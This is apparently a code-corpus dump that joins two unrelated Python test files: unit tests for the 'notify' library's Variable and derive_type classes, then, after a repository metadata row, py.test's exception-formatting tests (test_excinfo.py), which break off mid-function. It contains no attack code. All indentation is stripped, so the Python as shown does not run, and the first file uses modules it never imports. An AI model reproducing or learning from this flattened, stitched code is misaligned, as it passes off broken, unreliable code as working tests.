from notify.variable import AbstractVariable, AbstractValueTrackingVariable, Variable, \
WatcherVariable
from notify.utils import StringType
from test.__common import NotifyTestCase, NotifyTestObject
class BaseVariableTestCase (NotifyTestCase):
def test_mutable (self):
mutable_variable = Variable ()
self.assert_(mutable_variable.mutable)
def test_predicate_1 (self):
variable = Variable (0)
is_single_digit = variable.predicate (lambda value: 0 <= value < 10)
self.assert_(is_single_digit)
self.assert_(not is_single_digit.mutable)
variable.value = -5
self.assert_(not is_single_digit)
variable.value = 9
self.assert_(is_single_digit)
variable.value = 100
self.assert_(not is_single_digit)
def test_predicate_2 (self):
test = NotifyTestObject ()
variable = Variable (0)
variable.predicate (lambda value: 0 <= value < 10).store (test.simple_handler)
variable.value = 5
variable.value = 15
variable.value = -1
variable.value = 9
variable.value = 3
test.assert_results (True, False, True)
def test_is_true (self):
variable = Variable (0)
is_true = variable.is_true ()
self.assert_(not is_true)
variable.value = 'string'
self.assert_(is_true)
variable.value = []
self.assert_(not is_true)
variable.value = None
self.assert_(not is_true)
variable.value = 25
self.assert_(is_true)
def test_transformation_1 (self):
variable = Variable (0)
floor = variable.transform (math.floor)
self.assertEqual (floor.value, 0)
self.assert_(not floor.mutable)
variable.value = 10.5
self.assertEqual (floor.value, 10)
variable.value = 15
self.assertEqual (floor.value, 15)
def test_transformation_2 (self):
test = NotifyTestObject ()
variable = Variable (0)
variable.transform (math.floor).store (test.simple_handler)
variable.value = 5
variable.value = 5.6
variable.value = 15.7
variable.value = 16
variable.value = 16.5
variable.value = 16.2
test.assert_results (0, 5, 15, 16)
def test_is_allowed_value (self):
class PositiveVariable (Variable):
def is_allowed_value (self, value):
return isinstance (value, int) and value > 0
variable = PositiveVariable (6)
# Must not raise.
variable.value = 9
variable.value = 999
# Must raise.
self.assertRaises (ValueError, lambda: variable.set (0))
self.assertRaises (ValueError, lambda: variable.set (-5))
self.assertRaises (ValueError, lambda: variable.set (2.2))
self.assertRaises (ValueError, lambda: variable.set ([]))
class WatcherVariableTestCase (NotifyTestCase):
def test_watcher_variable_1 (self):
test = NotifyTestObject ()
watcher = WatcherVariable ()
watcher.store (test.simple_handler)
variable = Variable ('abc')
watcher.watch (variable)
self.assert_(watcher.watched_variable is variable)
variable.value = 60
test.assert_results (None, 'abc', 60)
def test_watcher_variable_2 (self):
test = NotifyTestObject ()
variable1 = Variable ([])
variable2 = Variable ('string')
variable3 = Variable ('string')
watcher = WatcherVariable (variable1)
watcher.store (test.simple_handler)
watcher.watch (variable2)
watcher.watch (variable3)
watcher.watch (None)
self.assert_(watcher.watched_variable is None)
# Later two watch() calls must not change watcher's value.
test.assert_results ([], 'string', None)
def test_watcher_variable_error_1 (self):
self.assertRaises (TypeError, lambda: WatcherVariable (25))
def test_watcher_variable_error_2 (self):
watcher = WatcherVariable ()
self.assertRaises (TypeError, lambda: watcher.watch (25))
def test_watcher_variable_error_3 (self):
variable = Variable ()
watcher = WatcherVariable (variable)
self.assertRaises (ValueError, lambda: watcher.watch (watcher))
self.assert_ (watcher.watched_variable is variable)
class VariableDerivationTestCase (NotifyTestCase):
def test_derivation_1 (self):
IntVariable = Variable.derive_type ('IntVariable', allowed_value_types = int)
# Since None is not an allowed value, there must be no default constructor.
self.assertRaises (TypeError, lambda: IntVariable ())
count = IntVariable (10)
self.assertEqual (count.value, 10)
self.assertEqual (count.mutable, True)
count.value = 30
self.assertEqual (count.value, 30)
self.assertRaises (ValueError, lambda: count.set ('invalid'))
def test_derivation_2 (self):
EnumVariable = Variable.derive_type ('EnumVariable',
allowed_values = (None, 'a', 'b', 'c'))
variable = EnumVariable ()
self.assertEqual (variable.value, None)
self.assertEqual (variable.mutable, True)
variable.value = 'b'
self.assertEqual (variable.value, 'b')
self.assertRaises (ValueError, lambda: variable.set (15))
self.assertRaises (ValueError, lambda: variable.set ('d'))
def test_derivation_3 (self):
AbstractIntVariable = AbstractValueTrackingVariable.derive_type (
'AbstractIntVariable', allowed_value_types = int)
self.assertEqual (AbstractIntVariable (-5).mutable, False)
def test_derivation_4 (self):
NumericVariable = Variable.derive_type ('NumericVariable',
allowed_value_types = (int, float, complex))
self.assertRaises (TypeError, lambda: NumericVariable ())
variable = NumericVariable (0)
variable.value = 15
self.assertEqual (variable.value, 15)
variable.value = -2.5
self.assertEqual (variable.value, -2.5)
variable.value = 1j
self.assertEqual (variable.value, 1j)
self.assertRaises (ValueError, lambda: variable.set ('string'))
self.assertRaises (ValueError, lambda: variable.set ([]))
def test_derivation_5 (self):
IntVariable = Variable.derive_type ('IntVariable',
allowed_value_types = int, default_value = 10)
variable = IntVariable ()
self.assertEqual (variable.value, 10)
variable = IntVariable (30)
self.assertEqual (variable.value, 30)
self.assertRaises (ValueError, lambda: variable.set ('string'))
def test_derivation_6 (self):
StringVariable = Variable.derive_type ('StringVariable',
allowed_value_types = StringType,
setter = lambda variable, value: None)
variable = StringVariable ('')
self.assertRaises (ValueError, lambda: variable.set (None))
def test_derivation_7 (self):
DerivedVariable = \
AbstractValueTrackingVariable.derive_type ('DerivedVariable',
setter = lambda variable, value: None)
variable = DerivedVariable ()
self.assert_(variable.value is None)
variable.set (100)
self.assert_(variable.value == 100)
variable.value = 'abc'
self.assert_(variable.value == 'abc')
def test_derivation_8 (self):
test = NotifyTestObject ()
DerivedVariable = \
AbstractValueTrackingVariable.derive_type ('DerivedVariable',
getter = lambda variable: None,
setter = (lambda variable, value:
test.simple_handler (value)))
variable = DerivedVariable ()
variable.set (100)
variable.value = 'abc'
# The default value is retrieved with the getter function, so the setter must not
# be called during variable creation.
test.assert_results (100, 'abc')
def test_derivation_9 (self):
test = NotifyTestObject ()
DerivedVariable = \
AbstractValueTrackingVariable.derive_type ('DerivedVariable',
setter = (lambda variable, value:
test.simple_handler (value)))
variable = DerivedVariable ()
variable.set (100)
variable.value = 'abc'
# There is no getter at all, so setter must be called during variable creation.
test.assert_results (None, 100, 'abc')
def test_derivation_10 (self):
def set_value (list, value):
list[0] = value
DerivedVariable = AbstractVariable.derive_type ('DerivedVariable',
object = '__list', property = 'list',
getter = lambda list: list[0],
setter = set_value)
a = DerivedVariable ([123])
self.assertEqual (a.value, 123)
a.value = 'foo'
self.assertEqual (a.value, 'foo')
self.assertEqual (a.list, ['foo'])
def test_derivation_11 (self):
# Test that derivation with keyword slot or property raises.
self.assertRaises (ValueError, lambda: AbstractVariable.derive_type ('DerivedVariable',
object = 'or'))
self.assertRaises (ValueError, lambda: AbstractVariable.derive_type ('DerivedVariable',
object = '__class',
property = 'class'))
# Test against a real bug present up to 0.1.12.
def test_derivation_12 (self):
DerivedVariable = AbstractValueTrackingVariable.derive_type ('DerivedVariable',
object = '__list',
property = 'list')
variable = DerivedVariable ([1, 2, 3], 200)
self.assertEqual (variable.list, [1, 2, 3])
self.assertEqual (variable.value, 200)
def test_object_derivation_1 (self):
class MainObject (object):
def __init__(self, x):
self.__x = x
def get_x (self):
return self.__x
XVariable = AbstractValueTrackingVariable.derive_type ('XVariable', object = 'main',
getter = MainObject.get_x)
main = MainObject (100)
variable = XVariable (main)
self.assert_(variable.main is main)
self.assert_(variable.value is main.get_x ())
main.x = 200
self.assert_(variable.value is main.get_x ())
def test_object_derivation_2 (self):
class MainObject (object):
def __init__(self, x):
self.__x = x
self.__x_variable = XVariable (self)
def get_x (self):
return self.__x
def _set_x (self, x):
self.__x = x
x = property (lambda self: self.__x_variable)
XVariable = AbstractValueTrackingVariable.derive_type ('XVariable',
object = '__main',
property = 'main',
getter = MainObject.get_x,
setter = MainObject._set_x)
main = MainObject (100)
self.assert_(main.x.main is main)
self.assert_(main.x.value is main.get_x ())
main.x.value = 200
self.assert_(main.x.value is main.get_x ())
def set_main_x ():
main.x = None
self.assertRaises (AttributeError, set_main_x)
def test_derivation_slots (self):
DerivedVariable = AbstractVariable.derive_type ('DerivedVariable')
self.assertRaises (AttributeError, self.non_existing_attribute_setter (DerivedVariable ()))
DerivedVariable = AbstractValueTrackingVariable.derive_type ('DerivedVariable')
self.assertRaises (AttributeError, self.non_existing_attribute_setter (DerivedVariable ()))
DerivedVariable = Variable.derive_type ('DerivedVariable')
self.assertRaises (AttributeError, self.non_existing_attribute_setter (DerivedVariable ()))
def test_multiple_derivation (self):
# Derive two types and make sure they don't spoil each other's is_allowed_value()
# method.
IntVariable = Variable.derive_type ('IntVariable', allowed_value_types = int)
StrVariable = Variable.derive_type ('StrVariable', allowed_value_types = str)
integer = IntVariable (10)
string = StrVariable ('test')
integer.value = 20
self.assertEqual (integer.value, 20)
string.value = 'string'
self.assertEqual (string.value, 'string')
self.assertRaises (ValueError, lambda: integer.set ('foo'))
self.assertRaises (ValueError, lambda: string .set (-1000))
self.assertRaises (ValueError, lambda: integer.set (''))
self.assertRaises (ValueError, lambda: string .set (0))
if __name__ == '__main__':
unittest.main ()
# Local variables:
# mode: python
# python-indent: 4
# indent-tabs-mode: nil
# fill-column: 90
# End:
| lgpl-2.1 |
samuknet/servo | tests/wpt/web-platform-tests/tools/py/testing/code/test_excinfo.py | 160 | 30688 | # -*- coding: utf-8 -*-
import py
from py._code.code import FormattedExcinfo, ReprExceptionInfo
queue = py.builtin._tryimport('queue', 'Queue')
failsonjython = py.test.mark.xfail("sys.platform.startswith('java')")
from test_source import astonly
try:
import importlib
except ImportError:
invalidate_import_caches = None
else:
invalidate_import_caches = getattr(importlib, "invalidate_caches", None)
import pytest
pytest_version_info = tuple(map(int, pytest.__version__.split(".")[:3]))
class TWMock:
def __init__(self):
self.lines = []
def sep(self, sep, line=None):
self.lines.append((sep, line))
def line(self, line, **kw):
self.lines.append(line)
def markup(self, text, **kw):
return text
fullwidth = 80
def test_excinfo_simple():
try:
raise ValueError
except ValueError:
info = py.code.ExceptionInfo()
assert info.type == ValueError
def test_excinfo_getstatement():
def g():
raise ValueError
def f():
g()
try:
f()
except ValueError:
excinfo = py.code.ExceptionInfo()
linenumbers = [py.code.getrawcode(f).co_firstlineno-1+3,
py.code.getrawcode(f).co_firstlineno-1+1,
py.code.getrawcode(g).co_firstlineno-1+1,]
l = list(excinfo.traceback)
foundlinenumbers = [x.lineno for x in l]
assert foundlinenumbers == linenumbers
#for x in info:
# print "%s:%d %s" %(x.path.relto(root), x.lineno, x.statement)
#xxx
# testchain for getentries test below
def f():
#
raise ValueError
#
def g():
#
__tracebackhide__ = True
f()
#
def h():
#
g()
#
class TestTraceback_f_g_h:
def setup_method(self, method):
try:
h()
except ValueError:
self.excinfo = py.code.ExceptionInfo()
def test_traceback_entries(self):
tb = self.excinfo.traceback
entries = list(tb)
assert len(tb) == 4 # maybe fragile test
assert len(entries) == 4 # maybe fragile test
names = ['f', 'g', 'h']
for entry in entries:
try:
names.remove(entry.frame.code.name)
except ValueError:
pass
assert not names
def test_traceback_entry_getsource(self):
tb = self.excinfo.traceback
s = str(tb[-1].getsource() )
assert s.startswith("def f():")
assert s.endswith("raise ValueError")
@astonly
@failsonjython
def test_traceback_entry_getsource_in_construct(self):
source = py.code.Source("""\
def xyz():
try:
raise ValueError
except somenoname:
pass
xyz()
""")
try:
exec (source.compile())
except NameError:
tb = py.code.ExceptionInfo().traceback
print (tb[-1].getsource())
s = str(tb[-1].getsource())
assert s.startswith("def xyz():\n try:")
assert s.strip().endswith("except somenoname:")
def test_traceback_cut(self):
co = py.code.Code(f)
path, firstlineno = co.path, co.firstlineno
traceback = self.excinfo.traceback
newtraceback = traceback.cut(path=path, firstlineno=firstlineno)
assert len(newtraceback) == 1
newtraceback = traceback.cut(path=path, lineno=firstlineno+2)
assert len(newtraceback) == 1
def test_traceback_cut_excludepath(self, testdir):
p = testdir.makepyfile("def f(): raise ValueError")
excinfo = py.test.raises(ValueError, "p.pyimport().f()")
basedir = py.path.local(py.test.__file__).dirpath()
newtraceback = excinfo.traceback.cut(excludepath=basedir)
for x in newtraceback:
if hasattr(x, 'path'):
assert not py.path.local(x.path).relto(basedir)
assert newtraceback[-1].frame.code.path == p
def test_traceback_filter(self):
traceback = self.excinfo.traceback
ntraceback = traceback.filter()
assert len(ntraceback) == len(traceback) - 1
def test_traceback_recursion_index(self):
def f(n):
if n < 10:
n += 1
f(n)
excinfo = py.test.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex == 3
def test_traceback_only_specific_recursion_errors(self, monkeypatch):
def f(n):
if n == 0:
raise RuntimeError("hello")
f(n-1)
excinfo = pytest.raises(RuntimeError, f, 100)
monkeypatch.delattr(excinfo.traceback.__class__, "recursionindex")
repr = excinfo.getrepr()
assert "RuntimeError: hello" in str(repr.reprcrash)
def test_traceback_no_recursion_index(self):
def do_stuff():
raise RuntimeError
def reraise_me():
import sys
exc, val, tb = sys.exc_info()
py.builtin._reraise(exc, val, tb)
def f(n):
try:
do_stuff()
except:
reraise_me()
excinfo = py.test.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex is None
def test_traceback_messy_recursion(self):
#XXX: simplified locally testable version
decorator = py.test.importorskip('decorator').decorator
def log(f, *k, **kw):
print('%s %s' % (k, kw))
f(*k, **kw)
log = decorator(log)
def fail():
raise ValueError('')
fail = log(log(fail))
excinfo = py.test.raises(ValueError, fail)
assert excinfo.traceback.recursionindex() is None
def test_traceback_getcrashentry(self):
def i():
__tracebackhide__ = True
raise ValueError
def h():
i()
def g():
__tracebackhide__ = True
h()
def f():
g()
excinfo = py.test.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = py.code.Code(h)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 1
assert entry.frame.code.name == 'h'
def test_traceback_getcrashentry_empty(self):
def g():
__tracebackhide__ = True
raise ValueError
def f():
__tracebackhide__ = True
g()
excinfo = py.test.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = py.code.Code(g)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 2
assert entry.frame.code.name == 'g'
def hello(x):
x + 5
def test_tbentry_reinterpret():
try:
hello("hello")
except TypeError:
excinfo = py.code.ExceptionInfo()
tbentry = excinfo.traceback[-1]
msg = tbentry.reinterpret()
assert msg.startswith("TypeError: ('hello' + 5)")
def test_excinfo_exconly():
excinfo = py.test.raises(ValueError, h)
assert excinfo.exconly().startswith('ValueError')
excinfo = py.test.raises(ValueError,
"raise ValueError('hello\\nworld')")
msg = excinfo.exconly(tryshort=True)
assert msg.startswith('ValueError')
assert msg.endswith("world")
def test_excinfo_repr():
excinfo = py.test.raises(ValueError, h)
s = repr(excinfo)
assert s == "<ExceptionInfo ValueError tblen=4>"
def test_excinfo_str():
excinfo = py.test.raises(ValueError, h)
s = str(excinfo)
assert s.startswith(__file__[:-9]) # pyc file and $py.class
assert s.endswith("ValueError")
assert len(s.split(":")) >= 3 # on windows it's 4
def test_excinfo_errisinstance():
excinfo = py.test.raises(ValueError, h)
assert excinfo.errisinstance(ValueError)
def test_excinfo_no_sourcecode():
try:
exec ("raise ValueError()")
except ValueError:
excinfo = py.code.ExceptionInfo()
s = str(excinfo.traceback[-1])
if py.std.sys.version_info < (2,5):
assert s == " File '<string>':1 in ?\n ???\n"
else:
assert s == " File '<string>':1 in <module>\n ???\n"
def test_excinfo_no_python_sourcecode(tmpdir):
#XXX: simplified locally testable version
tmpdir.join('test.txt').write("{{ h()}}:")
jinja2 = py.test.importorskip('jinja2')
loader = jinja2.FileSystemLoader(str(tmpdir))
env = jinja2.Environment(loader=loader)
template = env.get_template('test.txt')
excinfo = py.test.raises(ValueError,
template.render, h=h)
for item in excinfo.traceback:
print(item) #XXX: for some reason jinja.Template.render is printed in full
item.source # shouldnt fail
if item.path.basename == 'test.txt':
assert str(item.source) == '{{ h()}}:'
def test_entrysource_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = py.code.ExceptionInfo()
entry = excinfo.traceback[-1]
source = entry.getsource()
assert source is not None
s = str(source).strip()
assert s.startswith("def get")
def test_codepath_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = py.code.ExceptionInfo()
entry = excinfo.traceback[-1]
path = entry.path
assert isinstance(path, py.path.local)
assert path.basename.lower() == "queue.py"
assert path.check()
class TestFormattedExcinfo:
def pytest_funcarg__importasmod(self, request):
def importasmod(source):
source = py.code.Source(source)
tmpdir = request.getfuncargvalue("tmpdir")
modpath = tmpdir.join("mod.py")
tmpdir.ensure("__init__.py")
modpath.write(source)
if invalidate_import_caches is not None:
invalidate_import_caches()
return modpath.pyimport()
return importasmod
def excinfo_from_exec(self, source):
source = py.code.Source(source).strip()
try:
exec (source.compile())
except KeyboardInterrupt:
raise
except:
return py.code.ExceptionInfo()
assert 0, "did not raise"
def test_repr_source(self):
pr = FormattedExcinfo()
source = py.code.Source("""
def f(x):
pass
""").strip()
pr.flow_marker = "|"
lines = pr.get_source(source, 0)
assert len(lines) == 2
assert lines[0] == "| def f(x):"
assert lines[1] == " pass"
def test_repr_source_excinfo(self):
""" check if indentation is right """
pr = FormattedExcinfo()
excinfo = self.excinfo_from_exec("""
def f():
assert 0
f()
""")
pr = FormattedExcinfo()
source = pr._getentrysource(excinfo.traceback[-1])
lines = pr.get_source(source, 1, excinfo)
assert lines == [
' def f():',
'> assert 0',
'E assert 0'
]
def test_repr_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("raise ValueError()", "", "exec")
try:
exec (co)
except ValueError:
excinfo = py.code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_many_line_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("""
a = 1
raise ValueError()
""", "", "exec")
try:
exec (co)
except ValueError:
excinfo = py.code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_source_failing_fullsource(self):
pr = FormattedExcinfo()
class FakeCode(object):
class raw:
co_filename = '?'
path = '?'
firstlineno = 5
def fullsource(self):
return None
fullsource = property(fullsource)
class FakeFrame(object):
code = FakeCode()
f_locals = {}
f_globals = {}
class FakeTracebackEntry(py.code.Traceback.Entry):
def __init__(self, tb):
self.lineno = 5+3
@property
def frame(self):
return FakeFrame()
class Traceback(py.code.Traceback):
Entry = FakeTracebackEntry
class FakeExcinfo(py.code.ExceptionInfo):
typename = "Foo"
def __init__(self):
pass
def exconly(self, tryshort):
return "EXC"
def errisinstance(self, cls):
return False
excinfo = FakeExcinfo()
class FakeRawTB(object):
tb_next = None
tb = FakeRawTB()
excinfo.traceback = Traceback(tb)
fail = IOError()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
fail = py.error.ENOENT
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
def test_repr_local(self):
p = FormattedExcinfo(showlocals=True)
loc = {'y': 5, 'z': 7, 'x': 3, '@x': 2, '__builtins__': {}}
reprlocals = p.repr_locals(loc)
assert reprlocals.lines
assert reprlocals.lines[0] == '__builtins__ = <builtins>'
assert reprlocals.lines[1] == 'x = 3'
assert reprlocals.lines[2] == 'y = 5'
assert reprlocals.lines[3] == 'z = 7'
def test_repr_tracebackentry_lines(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello\\nworld")
""")
excinfo = py.test.raises(ValueError, mod.func1)
excinfo.traceback = excinfo.traceback.filter()
p = FormattedExcinfo()
reprtb = p.repr_traceback_entry(excinfo.traceback[-1])
# test as intermittent entry
lines = reprtb.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
# test as last entry
p = FormattedExcinfo(showlocals=True)
repr_entry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = repr_entry.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
assert lines[2] == 'E ValueError: hello'
assert lines[3] == 'E world'
assert not lines[4:]
loc = repr_entry.reprlocals is not None
loc = repr_entry.reprfileloc
assert loc.path == mod.__file__
assert loc.lineno == 3
#assert loc.message == "ValueError: hello"
def test_repr_tracebackentry_lines(self, importasmod):
mod = importasmod("""
def func1(m, x, y, z):
raise ValueError("hello\\nworld")
""")
excinfo = py.test.raises(ValueError, mod.func1, "m"*90, 5, 13, "z"*120)
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('m', repr("m"*90))
assert reprfuncargs.args[1] == ('x', '5')
assert reprfuncargs.args[2] == ('y', '13')
assert reprfuncargs.args[3] == ('z', repr("z" * 120))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "m = " + repr('m' * 90)
assert tw.lines[1] == "x = 5, y = 13"
assert tw.lines[2] == "z = " + repr('z' * 120)
def test_repr_tracebackentry_lines_var_kw_args(self, importasmod):
mod = importasmod("""
def func1(x, *y, **z):
raise ValueError("hello\\nworld")
""")
excinfo = py.test.raises(ValueError, mod.func1, 'a', 'b', c='d')
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('x', repr('a'))
assert reprfuncargs.args[1] == ('y', repr(('b',)))
assert reprfuncargs.args[2] == ('z', repr({'c': 'd'}))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "x = 'a', y = ('b',), z = {'c': 'd'}"
def test_repr_tracebackentry_short(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
basename = py.path.local(mod.__file__).basename
assert lines[0] == ' func1()'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 5
# test last entry
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprtb.lines
assert lines[0] == ' raise ValueError("hello")'
assert lines[1] == 'E ValueError: hello'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 3
def test_repr_tracebackentry_no(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="no")
p.repr_traceback_entry(excinfo.traceback[-2])
p = FormattedExcinfo(style="no")
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[0] == 'E ValueError: hello'
assert not lines[1:]
def test_repr_traceback_tbfilter(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo(tbfilter=True)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
p = FormattedExcinfo(tbfilter=False)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 3
def test_traceback_short_no_source(self, importasmod, monkeypatch):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = py.test.raises(ValueError, mod.entry)
from py._code.code import Code
monkeypatch.setattr(Code, 'path', 'bogus')
excinfo.traceback[0].frame.code.path = "bogus"
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
last_p = FormattedExcinfo(style="short")
last_reprtb = last_p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
last_lines = last_reprtb.lines
monkeypatch.undo()
basename = py.path.local(mod.__file__).basename
assert lines[0] == ' func1()'
assert last_lines[0] == ' raise ValueError("hello")'
assert last_lines[1] == 'E ValueError: hello'
def test_repr_traceback_and_excinfo(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
for style in ("long", "short"):
p = FormattedExcinfo(style=style)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
assert reprtb.style == style
assert not reprtb.extraline
repr = p.repr_excinfo(excinfo)
assert repr.reprtraceback
assert len(repr.reprtraceback.reprentries) == len(reprtb.reprentries)
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.message == "ValueError: 0"
def test_repr_traceback_with_invalid_cwd(self, importasmod, monkeypatch):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
p = FormattedExcinfo()
def raiseos():
raise OSError(2)
monkeypatch.setattr(py.std.os, 'getcwd', raiseos)
assert p._makepath(__file__) == __file__
reprtb = p.repr_traceback(excinfo)
def test_repr_excinfo_addouterr(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
repr.addsection("title", "content")
twmock = TWMock()
repr.toterminal(twmock)
assert twmock.lines[-1] == "content"
assert twmock.lines[-2] == ("-", "title")
def test_repr_excinfo_reprcrash(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.lineno == 3
assert repr.reprcrash.message == "ValueError"
assert str(repr.reprcrash).endswith("mod.py:3: ValueError")
def test_repr_traceback_recursion(self, importasmod):
mod = importasmod("""
def rec2(x):
return rec1(x+1)
def rec1(x):
return rec2(x-1)
def entry():
rec1(42)
""")
excinfo = py.test.raises(RuntimeError, mod.entry)
for style in ("short", "long", "no"):
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback(excinfo)
assert reprtb.extraline == "!!! Recursion detected (same locals & position)"
assert str(reprtb)
def test_tb_entry_AssertionError(self, importasmod):
# probably this test is a bit redundant
# as py/magic/testing/test_assertion.py
# already tests correctness of
# assertion-reinterpretation logic
mod = importasmod("""
def somefunc():
x = 1
assert x == 2
""")
excinfo = py.test.raises(AssertionError, mod.somefunc)
p = FormattedExcinfo()
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[-1] == "E assert 1 == 2"
def test_reprexcinfo_getrepr(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = py.test.raises(ValueError, mod.entry)
for style in ("short", "long", "no"):
for showlocals in (True, False):
repr = excinfo.getrepr(style=style, showlocals=showlocals)
assert isinstance(repr, ReprExceptionInfo)
assert repr.reprtraceback.style == style
def test_reprexcinfo_unicode(self):
from py._code.code import TerminalRepr
class MyRepr(TerminalRepr):
def toterminal(self, tw):
tw.line(py.builtin._totext("я", "utf-8"))
x = py.builtin._totext(MyRepr())
assert x == py.builtin._totext("я", "utf-8")
def test_toterminal_long(self, importasmod):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == " def f():"
assert tw.lines[1] == "> g(3)"
assert tw.lines[2] == ""
assert tw.lines[3].endswith("mod.py:5: ")
assert tw.lines[4] == ("_ ", None)
assert tw.lines[5] == ""
assert tw.lines[6] == " def g(x):"
assert tw.lines[7] == "> raise ValueError(x)"
assert tw.lines[8] == "E ValueError: 3"
assert tw.lines[9] == ""
assert tw.lines[10].endswith("mod.py:3: ValueError")
def test_toterminal_long_missing_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
tmpdir.join('mod.py').remove()
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_incomplete_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
tmpdir.join('mod.py').write('asdf')
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_filenames(self, importasmod):
mod = importasmod("""
def f():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.f)
tw = TWMock()
path = py.path.local(mod.__file__)
old = path.dirpath().chdir()
try:
repr = excinfo.getrepr(abspath=False)
repr.toterminal(tw)
line = tw.lines[-1]
x = py.path.local().bestrelpath(path)
